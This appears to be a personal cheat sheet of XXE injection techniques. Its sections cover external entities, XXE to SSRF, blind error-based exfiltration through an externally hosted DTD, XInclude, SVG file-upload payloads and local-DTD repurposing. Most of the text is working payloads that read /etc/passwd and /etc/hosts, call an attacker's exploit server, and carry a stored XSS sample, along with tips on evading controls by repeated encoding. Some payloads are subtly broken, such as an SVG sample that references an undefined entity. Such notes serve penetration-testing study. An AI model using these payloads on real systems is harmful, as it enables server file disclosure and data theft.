[XXE INJECTION]
GENERAL INFORMATION
NOTES: 1. Important to inspect the requests/responses, if XML code is present there's a chance to attempt XXE. 2. Each time you find a site to upload files and the .xml extention is allowed, XXE attempts are needed. 3. DTD means, data definition type. 4. Think on DTD as a "declared variable" that you can personalize and invoke. 5. One way to bypass chunk issues is to encode the payloads in base64. prettry used on blind attacks SAMPLE: <!ENTITY % VAR_NAME SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> 6. if some test are not providing results, attempt with an external dtd, so you can exfiltrate data a confirm a blind XXE. NOTE: xsl = extensible stylesheet language | it is the style sheet of XML. so it can be invoked similar as we do with XML attacks. <xsl:stylesheet version="1.0"> </xsl:stylesheet>EXTERNAL ENTITIES
1. Traffic inspection is needed. [burpsuite] SAMPLE: <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE attempt [ <!ENTITY CUMBIA SYSTEM "file:///etc/hosts">]> <Check> <Id>&CUMBIA;</Id> <productId>1</productId> </Check> GET DATA: <!DOCTYPE attempt [ <!ENTITY VAR_NAME SYSTEM "file:///etc/hosts"> ]> NOTE: Important, to invoke the entity/variable you are passing, it is needed to use specific characters, &VAR_NAME; XSS: <![CDATA[<script>alert('stored XXS!')</script>]]> NOTE: The name "CUMBIA" is the entity/variable name used to call /etc/hosts externally, it is invoked into the XML file and invoke it using one input field. !!!! Special section to put the XML code, between initial tag and function. CHECK SAMPLE! Modify the name as you want.CROSS ATTACKS
:::> XXE to SSRF There's one simple attempt that can be executed, for this case scenario a vuln_server will be needed to exploit this. This attack can be considered "external entities" attack. Same payload and technique can be used to exploit this. GET DATA: <!DOCTYPE attempt [ <!ENTITY VAR_NAME SYSTEM "http://IP_ADDR/URI_PATH"> ]> Sometimes each time you find and call a URL path, probably the application will be printing the current/next path in action. Try to see if others paths provide more information.BLIND TECHNIQUES
:::> VIA ERROR MESSAGES NOTES: - If the app is returning errors in regards XML parsing, technically that flaw can be abused to retrieve error messages. - It helps to exfil multi-line information. - Sometimes it is required two entities, one to define the file to exfil and the second one to try to read and generate the error. For that two functions are needed. exfil | eval - Out-of-band communications can help to discover this flaw. That is why sometimes is needed to use an external exploit server to host the exploit file. ATTACK SAMPLE: As it is a blind technique, an external exploit server to host the entities is needed. This flaw can be triggered locally, however, external interaction is required. ::: >> EXPLOIT SERVER HOSTING ENTITIES URL: https://URL/exploit _.STEP ONE: EXPLOIT FILE | CUMBIA.html <!DOCTYPE html> <html> <head> HTTP/1.1 200 OK Content-Type: text/plain; charset=utf-8 </head> <body> TEXT <!ENTITY % file SYSTEM "file:///etc/hosts"> <!ENTITY % eval "<!ENTITY % exfil SYSTEM 'file:///404FILE/%file;'>"> %eval; %exfil; </body> </html> NOTE: when invoking an entity into an entity, the % symbol need to be encoded as % ENTITY TO EXFIL: <!ENTITY % eval "<!ENTITY % exfil SYSTEM 'file:///404FILE/%file;'>"> ENTITY TO GENERATE ERROR: <!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///404FILE/%file;'>"> | _.STEP TWO: INSERT DTD <!DOCTYPE attempt [<!ENTITY % VAR_NAME SYSTEM "http://DTD-URL/CUMBIA.html"> %VAR_NAME;]> NOTE: very important to encode, encoding to base64, URL encode, etc. one time, two times, can bypass a lot of controls.EXPLOTE XInlcude
NOTES: - Is a part of the XML specification that allows an XML document to be built from sub-documents. - No way to control the entire XML document and so we cannot define the DOCTYPE element. That's when XInclude works! - You can place an XInclude attack within any data value in an XML document. So any input field can work! - It need two references, one to the structure and the second to the content to retrieve. SAMPLE: <NAME xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></NAME> xmlns, means the body structure of the file. xi, used to add attributes, sample: href, parsing, etc.XXE via FILE UPLOAD
it is important to note about possible options to upload files. - what are the extensions allowed ? - same similar techniques used on LFI or RFI can be applied. - SVG is formated in XML format, so each time you find a place to upload the files you can escalate from file upload to XXE. - you can create a image file, as it is XML format you can set some basic parameters to create a image to retrieve the content you are setting. payload: <?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY attempt SYSTEM "file:///etc/whoami" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg> it is added same format as RFI or LFI attacks.XXE TO RETRIEVE DATA / REPURPOSING A LOCAL DTD
- in order to exploit this one, you will need to reuse an existing DTD that is stored on the server, you will use it as benefit for the attack. - so first you need to know what environment you are working on to search for existing well know DTD to reference. format of the DTD to use: 1. you need to declare the local DTD 2. you need to declare the entity and inside retrieve the file/eval/error entities (check sample structure) 3. you need to declare the content to retrieve with a SYSTEM entity 4. you need to declare the EVAL entity with an ERROR entity to a non-existent file to generate the error 5. invoke all 3 entities sample payload: <!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd"> <!ENTITY % ISOamso ' <!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///nonexistent/%file;'>"> %eval; %error; '> %local_dtd; ]> NOTE: docbookx.dtd is a common DTD found on GNOME desktop. It is pretty important to understand how the local DTD works in order to use it, as it will be invoked.
©® - Since 2023